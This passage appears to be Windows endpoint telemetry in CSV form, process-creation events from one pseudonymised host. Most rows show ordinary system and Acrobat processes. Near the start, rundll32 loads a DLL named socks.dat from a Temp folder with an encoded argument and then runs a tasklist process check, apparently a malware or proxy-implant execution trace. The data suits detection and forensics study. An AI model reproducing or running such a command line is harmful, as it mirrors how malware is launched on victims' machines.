00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1509,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:25:19.761236700+00:00,6992,cmd.exe,"""cmd.exe"" /c ""tasklist | find ""10992""""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:25:19.896763700+00:00,2021-06-23 03:26:57.140056800+00:00,710b89c6-f145-4432-a9d2-dab7486a7f4d,computerpii_0a470890c60768167990033d701e7bd881398861,161568,False,10.7740.19041.1052,False,11540474045173046,,11540474045173133,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,rundll32.exe,16760,256,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1510,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:25:19.829449400+00:00,16612,tasklist.exe,tasklist  ,PortableExecutable,2019-12-07 09:09:51.678279900+00:00,C:\Windows\System32\tasklist.exe,106496,d0a49a170e13d7f6aebbefed9df88aaa,be7241a74fe9a9d30e0631e41533a362b21c8f7aae3e5b6ad319cc15c024ec3f,d61ffd641c2f6d45dadc26c02daeea8dabee8204,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:25:19.761236700+00:00,6992,cmd.exe,"""cmd.exe"" /c ""tasklist | find ""10992""""",True,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:25:19.900894400+00:00,2021-06-23 03:26:57.140119+00:00,9522fe0d-aeb8-4aed-923b-bab83288c9e6,computerpii_0a470890c60768167990033d701e7bd881398861,161569,False,10.7740.19041.1052,False,11540474045173133,,11540474045173135,2021-06-23 03:25:19.761236700+00:00,6992,2021-06-23 03:25:19.761236700+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,6992,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:25:19.799644900+00:00,2021-02-17 04:34:58.875918800+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,tasklist.exe,tasklist.exe,Lists the current running tasks
+1511,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:25:19.835730100+00:00,10184,find.exe,"find  ""10992""",PortableExecutable,2019-12-07 09:09:37.707866+00:00,C:\Windows\System32\find.exe,17920,ae3f3dc3ed900f2a582bad86a764508c,1a1876c5eed2b8cd9e14ebff3f4eeb7e21552a4c6aab4bf392a55f8df3612dab,1e44ee63bdb2cf3a6e48b521844204218a001344,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:25:19.761236700+00:00,6992,cmd.exe,"""cmd.exe"" /c ""tasklist | find ""10992""""",True,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:25:19.901245700+00:00,2021-06-23 03:26:57.140204800+00:00,76b7184e-1cb6-48dd-b382-ee2bfc422a2a,computerpii_0a470890c60768167990033d701e7bd881398861,161570,False,10.7740.19041.1052,False,11540474045173133,,11540474045173136,2021-06-23 03:25:19.761236700+00:00,6992,2021-06-23 03:25:19.761236700+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,6992,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:25:19.799644900+00:00,2021-02-17 04:34:58.875918800+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,find,FIND.EXE,Find String (grep) Utility
+1512,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-22 11:17:29.430145400+00:00,12744,LogTransport2.exe,"""LogTransport2.exe"" 58F761C05F236BDC0A495FBA@AdobeID 1 0 NOVALUE NOVALUE",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\LogTransport2.exe,855264,5f478ee4a63932d1ed50a41c55a29e23,c7578c3d0f3a474bee2788cb8560fff57ddaecd1138b98e334ba92941c58a754,fdd8d08ae21a4edd569c31f098ad75aaacd783e2,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-22 01:27:18.538402200+00:00,1440,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_c130b32bba8b4030b70be3bcd1e9996d46abfb2d.pdf""",False,2021-06-22 00:42:37.789896700+00:00,10576,OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:29.492996300+00:00,2021-06-23 00:51:09.675008900+00:00,5df66e87-a3cc-47a7-a657-e395335cc2c7,computerpii_0a470890c60768167990033d701e7bd881398861,154015,False,10.7740.19041.1052,False,11540474045169334,,11540474045171716,2021-06-22 01:27:18.538402200+00:00,1440,2021-06-22 01:27:18.538402200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,1440,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-22 01:27:18.541572600+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,352802188,352802188,False,,,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,Adobe Systems Incorporated, LogTransport Application,8.2.0.14,LogTransport2,LogTransport2.exe,LogTransport Application
+1513,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-22 11:17:29.461281900+00:00,17064,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,5f478ee4a63932d1ed50a41c55a29e23,c7578c3d0f3a474bee2788cb8560fff57ddaecd1138b98e334ba92941c58a754,fdd8d08ae21a4edd569c31f098ad75aaacd783e2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-22 11:17:29.430145400+00:00,12744,LogTransport2.exe,"""LogTransport2.exe"" 58F761C05F236BDC0A495FBA@AdobeID 1 0 NOVALUE NOVALUE",False,2021-06-22 01:27:18.538402200+00:00,1440,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:29.493870200+00:00,2021-06-23 00:51:09.675061200+00:00,ed71be3b-c2f8-4dc7-a938-4c180f7deabe,computerpii_0a470890c60768167990033d701e7bd881398861,154016,False,10.7740.19041.1052,False,11540474045171716,,11540474045171717,2021-06-22 11:17:29.430145400+00:00,12744,2021-06-22 11:17:29.430145400+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\LogTransport2.exe,12744,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,855264,2021-03-12 07:10:28+00:00,2021-05-28 05:58:58+00:00,2021-06-22 11:17:29.489368900+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,352802188,352802188,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,Adobe Systems Incorporated, LogTransport Application,8.2.0.14,LogTransport2,LogTransport2.exe,LogTransport Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1514,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-22 11:17:36.333146300+00:00,19212,smss.exe,smss.exe 000000a4 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,PortableExecutable,2021-05-12 01:12:36.677345+00:00,C:\Windows\System32\smss.exe,155976,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:07.324991200+00:00,728,smss.exe,smss.exe,True,2021-06-10 00:46:07.323061100+00:00,4,%system%\ntoskrnl.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:36.359019300+00:00,2021-06-23 00:51:09.677575+00:00,18971148-5e2a-455f-9947-9c26424463fd,computerpii_0a470890c60768167990033d701e7bd881398861,154062,False,10.7740.19041.1052,False,11540474045136899,,11540474045171718,2021-06-10 00:46:07.324991200+00:00,728,2021-06-10 00:46:07.324991200+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,728,16512,ActiveProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-10 00:46:10.497846200+00:00,2021-05-12 01:12:36.677345+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager
+1515,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-22 11:17:36.361284400+00:00,8488,csrss.exe,"csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16",PortableExecutable,2020-10-09 20:47:25.808617300+00:00,C:\Windows\System32\csrss.exe,17600,72565e7a0145e0657e586f6cf7696dc7,6f1c9b4c187669bc0371260d121caf48d65f829a9104c483befbd8fc0bed24f5,11eba7b1e26cc7d492a2c161ac48370811d0b01e,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.333146300+00:00,19212,smss.exe,smss.exe 000000a4 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,True,2021-06-10 00:46:07.324991200+00:00,728,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:36.485344400+00:00,2021-06-23 00:51:09.677838300+00:00,194deb04-d64d-40d2-b14d-13b211d492ad,computerpii_0a470890c60768167990033d701e7bd881398861,154067,False,10.7740.19041.1052,False,11540474045171718,,11540474045171719,2021-06-22 11:17:36.333146300+00:00,19212,2021-06-22 11:17:36.333146300+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,19212,128,TerminateProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-22 11:17:36.339032200+00:00,2021-05-12 01:12:36.677345+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,CSRSS.Exe,CSRSS.Exe,Client Server Runtime Process
+1516,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,PortableExecutable,2021-04-14 01:10:22.046876900+00:00,C:\Windows\System32\winlogon.exe,907776,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.333146300+00:00,19212,smss.exe,smss.exe 000000a4 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,True,2021-06-10 00:46:07.324991200+00:00,728,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:36.490553900+00:00,2021-06-23 00:51:09.677890200+00:00,bfd909b6-7d83-4aa0-8d03-ff1f96eca8b1,computerpii_0a470890c60768167990033d701e7bd881398861,154068,False,10.7740.19041.1052,False,11540474045171718,,11540474045171720,2021-06-22 11:17:36.333146300+00:00,19212,2021-06-22 11:17:36.333146300+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,19212,128,TerminateProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-22 11:17:36.339032200+00:00,2021-05-12 01:12:36.677345+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application
+1517,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-22 11:17:36.430453400+00:00,4208,LogonUI.exe,"""LogonUI.exe"" /flags:0x4 /state0:0xadf3b055 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-21 11:15:35.439148800+00:00,19280,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-21 11:15:35.370648800+00:00,10520,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:36.491983+00:00,2021-06-23 00:51:09.677944800+00:00,e34de85c-269e-46ab-83a6-b2386268c8e4,computerpii_0a470890c60768167990033d701e7bd881398861,154069,False,10.7740.19041.1052,False,11540474045168703,,11540474045171721,2021-06-21 11:15:35.439148800+00:00,19280,2021-06-21 11:15:35.439148800+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,19280,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-21 11:15:35.430014700+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1518,False,Low,S-1-5-96-0-16,UserPII_34d7796a2fd538a06192e8c795a541de1b7871b0,DomainPII_a2be182551aacddef017cf9363706e91d81d4423,TokenElevationTypeDefault,NotWeb,2021-06-22 11:17:36.481733900+00:00,15760,fontdrvhost.exe,"""fontdrvhost.exe""",PortableExecutable,2021-04-14 01:10:21.939209700+00:00,C:\Windows\System32\fontdrvhost.exe,825880,2cde36034913cb3869c8cfcdd5a616ff,ad6731a03531b1214e9fbd8afdf925ebf8adb490e79127729f0312316add3207,30d135dcc5406e84b08a2cd676190b4d8d919ef4,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:36.615281300+00:00,2021-06-23 00:51:09.678373300+00:00,3b4883d8-d4cd-4bad-ab51-bec5a911157a,computerpii_0a470890c60768167990033d701e7bd881398861,154077,False,10.7740.19041.1052,False,11540474045171720,,11540474045171722,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,387767130,False,,0.0,,65536.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,fontdrvhost.exe,fontdrvhost.exe,Usermode Font Driver Host
+1519,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-22 11:17:36.540360500+00:00,15500,LogonUI.exe,"""LogonUI.exe"" /flags:0x2 /state0:0xadf3c855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:36.642733400+00:00,2021-06-23 00:51:09.678428900+00:00,32dc9b6b-738f-45a7-9631-cc09d8f1604a,computerpii_0a470890c60768167990033d701e7bd881398861,154078,False,10.7740.19041.1052,False,11540474045171720,,11540474045171723,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1520,False,System,S-1-5-90-0-16,UserPII_0fa2534d2b632c0a0bf2d79055d78870826d04e6,DomainPII_6ec056e8fda78656edc46e4c7be3f929091d68ee,TokenElevationTypeLimited,NotWeb,2021-06-22 11:17:36.543409600+00:00,18804,dwm.exe,"""dwm.exe""",PortableExecutable,2021-02-17 04:35:04.693102300+00:00,C:\Windows\System32\dwm.exe,94720,5c27608411832c5b39ba04e33d53536c,0ac827c9e35cdaa492ddd435079415805dcc276352112b040bcd34ef122cf565,f92f8b7439ce1de4c297046ed1d3ff9f20bc97af,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:36.655413900+00:00,2021-06-23 00:51:09.678481100+00:00,14a929bc-bf34-4038-b88a-b7f4dc02437d,computerpii_0a470890c60768167990033d701e7bd881398861,154079,False,10.7740.19041.1052,False,11540474045171720,,11540474045171724,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 